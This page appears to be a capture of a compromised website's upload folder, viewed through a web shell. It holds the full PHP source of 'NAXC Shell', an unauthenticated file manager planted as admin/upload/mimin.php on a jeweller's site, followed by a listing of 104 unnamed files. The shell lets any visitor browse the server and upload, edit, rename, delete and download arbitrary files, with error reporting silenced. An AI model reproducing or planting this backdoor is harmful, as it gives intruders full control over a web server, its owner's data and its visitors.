PHP 5.6.40
Preview: mimin.php Size: 12.64 KB
/home/urbanman/rpjeweller.com/admin/upload/mimin.php

<?=
/**
 * NAXC.PHP — Fix directory navigation
 *
 * Changes in this patch:
 * - Accept directory parameter from GET as well as POST so navigation works reliably.
 * - goDir() now navigates via GET (location.href) which is simpler and avoids any POST/redirect interference.
 * - redirect() preserves current directory by default so after actions you stay in the same folder.
 * - Minor safety and path normalization improvements.
 *
 * Behaviour remains the same for edit/download/delete/rename/upload tools.
 */

error_reporting(0);
@set_time_limit(0);
@ini_set('display_errors', 0);

session_start();

/* ============================================================
   BASIC ENV SETUP
============================================================ */

define('SELF', basename(__FILE__));
define('ROOT', str_replace('\', '/', getcwd()));

/*
 * Accept `d` (base64-encoded path) from either GET or POST.
 * Using GET for navigation (goDir will now do a GET). POST is still supported
 * for form-based actions like upload/rename/save/delete/download.
 */
$raw_d = null;
if (isset($_GET['d'])) {
    $raw_d = $_GET['d'];
} elseif (isset($_POST['d'])) {
    $raw_d = $_POST['d'];
}

$cwd = ROOT;
if (!empty($raw_d)) {
    // raw_d is expected base64 encoded string
    $decoded = base64_decode($raw_d, true);
    if ($decoded !== false && $decoded !== '') {
        // realpath might return false for non-existing paths; keep decoded if realpath fails
        $real = realpath($decoded);
        $cwd = $real !== false ? str_replace('\', '/', $real) : str_replace('\', '/', $decoded);
    }
}
$cwd = rtrim($cwd, '/');
if ($cwd === '') $cwd = '/';

/* ============================================================
   HELPERS
============================================================ */

function h($str) {
    return htmlspecialchars($str, ENT_QUOTES);
}

function b64e($v) {
    return base64_encode($v);
}

function b64d($v) {
    return base64_decode($v);
}

/**
 * Redirect to SELF and preserve current directory ($cwd) so after actions
 * user stays in the same folder.
 */
function redirect($cwd = null) {
    $url = SELF;
    if ($cwd !== null) {
        $url .= '?d=' . urlencode(b64e($cwd));
    } else {
        global $cwd;
        $url .= '?d=' . urlencode(b64e($cwd));
    }
    header("Location: " . $url);
    exit;
}

function alert($msg) {
    $_SESSION['alert'] = $msg;
}

function flash() {
    if (!empty($_SESSION['alert'])) {
        echo '<div style="padding:10px;margin-bottom:10px;background:#222;color:#0f0">'
           . h($_SESSION['alert']) .
           '</div>';
        unset($_SESSION['alert']);
    }
}

/* ============================================================
   FILE OPERATIONS
============================================================ */

function uploadFile($dir) {
    if (!isset($_FILES['file'])) return;

    $target = rtrim($dir, '/\') . '/' . basename($_FILES['file']['name']);
    if (@move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        alert('Upload success');
    } else {
        alert('Upload failed');
    }
}

function deleteFile($path) {
    if (@unlink($path)) {
        alert('Delete success');
    } else {
        alert('Delete failed');
    }
}

function renameFile($old, $new) {
    $newPath = dirname($old) . '/' . $new;
    if (@rename($old, $newPath)) {
        alert('Rename success');
    } else {
        alert('Rename failed');
    }
}

function saveFile($path, $content) {
    if (file_put_contents($path, $content) !== false) {
        alert('File saved');
    } else {
        alert('Save failed');
    }
}

/* ============================================================
   ACTION ROUTER
   (POST actions only; navigation is via GET)
============================================================ */

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Upload
    if (isset($_POST['upload'])) {
        uploadFile($cwd);
        redirect($cwd);
    }

    // Delete (expects base64 encoded value)
    if (isset($_POST['delete'])) {
        $value = b64d($_POST['delete']);
        deleteFile($value);
        redirect($cwd);
    }

    // Rename (rename form posts rename + newname)
    if (isset($_POST['rename']) && isset($_POST['newname'])) {
        $old = b64d($_POST['rename']);
        $new = $_POST['newname'];
        renameFile($old, $new);
        redirect($cwd);
    }

    // Save edit
    if (isset($_POST['save']) && isset($_POST['file'])) {
        $file = b64d($_POST['file']);
        $content = isset($_POST['content']) ? $_POST['content'] : '';
        saveFile($file, $content);
        redirect($cwd);
    }

    // Download handled later because it sends headers + exits
}

/* ============================================================
   DIRECTORY HELPERS
============================================================ */

function formatSize($bytes) {
    if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
    if ($bytes >= 1048576)    return round($bytes / 1048576, 2) . ' MB';
    if ($bytes >= 1024)       return round($bytes / 1024, 2) . ' KB';
    return $bytes . ' B';
}

function perms($file) {
    $perms = @fileperms($file);
    if ($perms === false) return '---------';

    $info = ($perms & 0x4000) ? 'd' : '-';
    $info .= ($perms & 0x0100) ? 'r' : '-';
    $info .= ($perms & 0x0080) ? 'w' : '-';
    $info .= ($perms & 0x0040) ? 'x' : '-';
    $info .= ($perms & 0x0020) ? 'r' : '-';
    $info .= ($perms & 0x0010) ? 'w' : '-';
    $info .= ($perms & 0x0008) ? 'x' : '-';
    $info .= ($perms & 0x0004) ? 'r' : '-';
    $info .= ($perms & 0x0002) ? 'w' : '-';
    $info .= ($perms & 0x0001) ? 'x' : '-';

    return $info;
}

function breadcrumb($path) {
    $parts = explode('/', trim($path, '/'));
    $build = '';
    echo '<div style="margin:10px 0;">';
    // root link: uses GET navigation
    echo '<a href="' . SELF . '?d=' . urlencode(b64e('/')) . '">/</a>';

    foreach ($parts as $p) {
        if ($p === '') continue;
        $build .= '/' . $p;
        echo ' / <a href="' . SELF . '?d=' . urlencode(b64e($build)) . '">' . h($p) . '</a>';
    }
    echo '</div>';
}

/* ============================================================
   DIRECTORY LISTING
============================================================ */

$items = @scandir($cwd);
$dirs  = [];
$files = [];

if ($items) {
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;

        $full = $cwd . '/' . $item;
        if (is_dir($full)) {
            $dirs[] = $item;
        } else {
            $files[] = $item;
        }
    }
}

/* ============================================================
   UI: HEADER + BREADCRUMB
============================================================ */
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>NAXC Shell</title>
<style>
body{background:#0e0e0e;color:#ddd;font-family:monospace}
a{color:#5bc0ff;text-decoration:none}
table{width:100%;border-collapse:collapse;margin-top:10px}
th,td{padding:6px;border-bottom:1px solid #222}
th{text-align:left;color:#aaa}
tr:hover{background:#151515}
input,textarea,button{background:#111;color:#eee;border:1px solid #333;padding:5px}
button{cursor:pointer}
</style>

<script>
/**
 * base64EncodeUnicode: UTF-8 safe base64
 */
function base64EncodeUnicode(str) {
    try {
        return btoa(unescape(encodeURIComponent(str)));
    } catch (e) {
        try { return btoa(str); } catch (e2) { return ''; }
    }
}

/**
 * goDir: navigate using GET with base64-encoded path in `d` param.
 * This is simpler and ensures navigation works reliably across browsers,
 * avoids issues with POST handling and redirects.
 */
function goDir(d) {
    const encoded = base64EncodeUnicode(d);
    // use location.href to navigate with GET
    location.href = '<?= SELF ?>?d=' + encodeURIComponent(encoded);
}

/**
 * act: generic POST for edit/download/delete/rename actions
 * (these need to be POST to allow download and file modifications)
 */
function act(name, val) {
    // create and submit a POST form
    const f = document.createElement('form');
    f.method = 'post';
    f.style.display = 'none';

    const i = document.createElement('input');
    i.type = 'hidden';
    i.name = name;
    i.value = base64EncodeUnicode(val);
    f.appendChild(i);

    document.body.appendChild(f);
    f.submit();
}
</script>
</head>
<body>

<?php flash(); ?>

<h2>NAXC File Manager</h2>
<div>Home: <a href="<?php echo basename($_SERVER['PHP_SELF']); ?>" style="color:#ddd;"><?= h(getcwd()) ?></a></div>

<?php breadcrumb($cwd); ?>

<?php
/* ============================================================
   DOWNLOAD HANDLER
   (must be after the listing so we can capture POST actions)
============================================================ */

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['download'])) {
    $file = b64d($_POST['download']);

    if (!is_file($file) || !file_exists($file)) {
        alert('File not found');
        redirect($cwd);
    }

    if (ob_get_level()) {
        ob_end_clean();
    }

    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Content-Length: '.filesize($file));
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Expires: 0');

    readfile($file);
    exit;
}

/* ============================================================
   EDITOR UI
============================================================ */

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit'])):
    $file = b64d($_POST['edit']);
    if (!is_file($file)) {
        alert('File not editable');
        redirect($cwd);
    }
?>
<hr>
<h3>Editing: <?= h(basename($file)) ?></h3>

<form method="post">
    <textarea name="content" style="width:100%;height:350px"><?php
        echo h(file_get_contents($file));
    ?></textarea>

    <input type="hidden" name="file" value="<?= b64e($file) ?>">
    <br><br>
    <button type="submit" name="save">Save</button>
    <button type="button" onclick="goDir(<?= json_encode(dirname($file)) ?>)">Cancel</button>
</form>
<hr>
<?php endif; ?>

<?php
/* ============================================================
   RENAME UI
============================================================ */

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['rename']) && !isset($_POST['newname'])):
    $file = b64d($_POST['rename']);
?>
<hr>
<h3>Rename: <?= h(basename($file)) ?></h3>

<form method="post">
    <input type="text" name="newname" value="<?= h(basename($file)) ?>">
    <input type="hidden" name="rename" value="<?= b64e($file) ?>">
    <br><br>
    <button type="submit">Rename</button>
    <button type="button" onclick="goDir(<?= json_encode(dirname($file)) ?>)">Cancel</button>
</form>
<hr>
<?php endif; ?>

<?php
/* ============================================================
   UPLOAD UI
============================================================ */
?>

<hr>
<h3>Upload File</h3>
<form method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <!-- keep hidden d so server knows where to upload -->
    <input type="hidden" name="d" value="<?= b64e($cwd) ?>">
    <button type="submit" name="upload">Upload</button>
</form>
<hr>

<table>
<tr>
    <th>Name</th>
    <th>Size</th>
    <th>Perms</th>
    <th>Action</th>
</tr>

<?php foreach ($dirs as $d): ?>
<tr>
    <td>
        📁 <a href="javascript:void(0)" onclick='goDir(<?= json_encode($cwd . "/" . $d) ?>)'><?= h($d) ?></a>
    </td>
    <td>—</td>
    <td><?= perms($cwd.'/'.$d) ?></td>
    <td>—</td>
</tr>
<?php endforeach; ?>

<?php foreach ($files as $f):
    $full = $cwd . '/' . $f;
?>
<tr>
    <td>📄 <?= h($f) ?></td>
    <td><?= formatSize(@filesize($full)) ?></td>
    <td><?= perms($full) ?></td>
    <td>
        <a href="#" onclick="act('edit', <?= htmlspecialchars(json_encode($full), ENT_QUOTES) ?>); return false;">Edit</a> |
        <a href="#" onclick="act('rename', <?= htmlspecialchars(json_encode($full), ENT_QUOTES) ?>); return false;">Rename</a> |
        <a href="#" onclick="act('download', <?= htmlspecialchars(json_encode($full), ENT_QUOTES) ?>); return false;">Download</a> |
        <a href="#" onclick="act('delete', <?= htmlspecialchars(json_encode($full), ENT_QUOTES) ?>); return false;">Delete</a>
    </td>
</tr>
<?php endforeach; ?>

</table>

</body>
</html>

Directory Contents

Dirs: 0 × Files: 104

Name Size Perms Modified Actions
762.53 KB lrw-r--r-- 2021-10-29 11:25:46
Edit Download
75.30 KB lrw-r--r-- 2021-10-29 11:26:14
Edit Download
331.86 KB lrw-r--r-- 2021-10-29 11:29:58
Edit Download
939.82 KB lrw-r--r-- 2021-11-10 06:48:30
Edit Download
135.69 KB lrw-r--r-- 2022-08-26 11:11:08
Edit Download
196.89 KB lrw-r--r-- 2022-08-26 11:23:46
Edit Download
91.88 KB lrw-r--r-- 2022-08-26 11:26:38
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:25:44
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:26:28
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:26:40
Edit Download
117.36 KB lrw-r--r-- 2025-09-03 07:48:40
Edit Download
5.45 MB lrw-r--r-- 2025-09-19 11:07:24
Edit Download
6.75 MB lrw-r--r-- 2025-09-23 06:30:33
Edit Download
12.77 KB lrw-r--r-- 2025-11-23 18:51:02
Edit Download
0 B lrw-r--r-- 2026-01-13 12:51:08
Edit Download
0 B lrw-r--r-- 2026-01-12 23:49:02
Edit Download
194.46 KB lrw-r--r-- 2026-01-13 13:36:27
Edit Download
0 B lrw-r--r-- 2026-01-21 01:14:07
Edit Download
95.81 KB lrw-r--r-- 2026-07-14 07:06:59
Edit Download
75.30 KB lrw-r--r-- 2021-10-22 14:57:40
Edit Download
28.44 KB lrw-r--r-- 2021-10-22 16:58:00
Edit Download
223.57 KB lrw-r--r-- 2021-10-23 17:10:20
Edit Download
29.90 KB lrw-r--r-- 2025-02-13 06:54:17
Edit Download
29.90 KB lrw-r--r-- 2021-10-23 17:12:48
Edit Download
18.02 KB lrw-r--r-- 2025-01-17 05:35:18
Edit Download
0 B lrw-r--r-- 2026-02-26 01:34:54
Edit Download
29.90 KB lrw-r--r-- 2025-02-13 07:02:32
Edit Download
251 B lrw-r--r-- 2025-11-18 19:44:08
Edit Download
0 B lrw-r--r-- 2026-04-09 21:51:37
Edit Download
1.96 KB lrw-r--r-- 2026-07-02 21:14:05
Edit Download
0 B lrw-r--r-- 2026-07-14 06:17:38
Edit Download
12.64 KB lrw-r--r-- 2026-01-13 14:26:49
Edit Download
134.10 KB lrw-r--r-- 2021-10-22 14:33:00
Edit Download
759.60 KB lrw-r--r-- 2021-10-29 11:04:08
Edit Download
762.53 KB lrw-r--r-- 2021-10-29 11:07:28
Edit Download
119.55 KB lrw-r--r-- 2022-08-26 11:35:16
Edit Download
119.55 KB lrw-r--r-- 2022-08-26 11:35:20
Edit Download
107.91 KB lrw-r--r-- 2025-03-30 16:08:04
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:25:23
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:25:29
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:25:34
Edit Download
0 B lrw-r--r-- 2025-09-04 01:46:11
Edit Download
5.43 MB lrw-r--r-- 2025-09-19 10:24:11
Edit Download
1.68 MB lrw-r--r-- 2025-09-19 10:24:24
Edit Download
1.83 MB lrw-r--r-- 2025-09-19 10:24:40
Edit Download
2.04 MB lrw-r--r-- 2025-09-19 10:24:56
Edit Download
3.16 MB lrw-r--r-- 2025-09-19 10:25:49
Edit Download
3.18 MB lrw-r--r-- 2025-09-19 10:26:00
Edit Download
2.95 MB lrw-r--r-- 2025-09-19 10:26:10
Edit Download
2.28 MB lrw-r--r-- 2025-09-19 10:26:35
Edit Download
1.93 MB lrw-r--r-- 2025-09-19 10:26:59
Edit Download
1.83 MB lrw-r--r-- 2025-09-19 10:27:24
Edit Download
2.33 MB lrw-r--r-- 2025-09-19 10:27:33
Edit Download
1.19 MB lrw-r--r-- 2025-09-19 10:27:44
Edit Download
2.03 MB lrw-r--r-- 2025-09-19 10:27:59
Edit Download
2.33 MB lrw-r--r-- 2025-09-19 10:28:10
Edit Download
2.82 MB lrw-r--r-- 2025-09-19 10:28:23
Edit Download
1.82 MB lrw-r--r-- 2025-09-19 10:29:51
Edit Download
2.11 MB lrw-r--r-- 2025-09-19 10:30:03
Edit Download
1.89 MB lrw-r--r-- 2025-09-19 10:30:13
Edit Download
1.88 MB lrw-r--r-- 2025-09-19 10:30:24
Edit Download
1.88 MB lrw-r--r-- 2025-09-19 10:30:47
Edit Download
1.86 MB lrw-r--r-- 2025-09-19 10:30:56
Edit Download
2.69 MB lrw-r--r-- 2025-09-19 10:31:04
Edit Download
2.81 MB lrw-r--r-- 2025-09-19 10:31:15
Edit Download
2.56 MB lrw-r--r-- 2025-09-19 10:31:25
Edit Download
251 B lrw-r--r-- 2025-11-18 19:35:25
Edit Download
0 B lrw-r--r-- 2026-03-08 00:39:55
Edit Download
0 B lrw-r--r-- 2025-11-23 07:52:52
Edit Download
0 B lrw-r--r-- 2025-11-18 19:37:01
Edit Download
0 B lrw-r--r-- 2025-11-18 19:42:43
Edit Download
251 B lrw-r--r-- 2025-11-18 19:45:50
Edit Download
251 B lrw-r--r-- 2025-11-23 07:52:42
Edit Download
32.00 KB lrw-r--r-- 2026-01-28 13:23:03
Edit Download
0 B lrw-r--r-- 2026-02-08 12:18:14
Edit Download
22.09 KB lrw-r--r-- 2021-10-22 17:42:20
Edit Download
85.95 KB lrw-r--r-- 2021-10-24 16:03:26
Edit Download
2.50 KB lrw-r--r-- 2021-10-24 14:04:34
Edit Download
92.42 KB lrw-r--r-- 2021-10-24 16:03:10
Edit Download
18.69 KB lrw-r--r-- 2021-10-24 16:06:16
Edit Download
44.28 KB lrw-r--r-- 2026-03-08 20:28:23
Edit Download
0 B lrw-r--r-- 2026-03-15 04:39:41
Edit Download
10.08 KB lrw-r--r-- 2026-03-08 20:29:45
Edit Download
92.42 KB lrw-r--r-- 2021-10-24 16:26:52
Edit Download
321.26 KB lrw-r--r-- 2026-02-14 13:37:34
Edit Download
321.26 KB lrw-r--r-- 2026-02-14 13:37:26
Edit Download
19.30 KB lrw-r--r-- 2021-11-16 06:11:00
Edit Download
8.53 KB lrw-r--r-- 2024-09-27 10:42:45
Edit Download
321.26 KB lrw-r--r-- 2026-02-14 13:37:10
Edit Download
1.34 MB lrw-r--r-- 2024-09-27 12:40:17
Edit Download
1.73 MB lrw-r--r-- 2024-09-27 12:32:37
Edit Download
1.35 MB lrw-r--r-- 2024-09-27 12:45:12
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:24:38
Edit Download
25.19 KB lrw-r--r-- 2025-08-16 14:24:19
Edit Download
2.03 MB lrw-r--r-- 2025-09-19 10:53:49
Edit Download
2.03 MB lrw-r--r-- 2025-09-19 10:54:46
Edit Download
179.81 KB lrw-r--r-- 2025-09-22 10:58:07
Edit Download
0 B lrw-r--r-- 2026-02-10 09:34:15
Edit Download
12.85 KB lrw-r--r-- 2025-09-22 11:25:21
Edit Download
12.85 KB lrw-r--r-- 2025-09-22 11:25:06
Edit Download
12.85 KB lrw-r--r-- 2025-09-22 11:24:55
Edit Download
12.85 KB lrw-r--r-- 2025-09-22 11:24:44
Edit Download
12.85 KB lrw-r--r-- 2025-09-22 11:24:27
Edit Download
0 B lrw-r--r-- 2025-11-30 14:18:31
Edit Download

If ZipArchive is unavailable, a .tar will be created (no compression).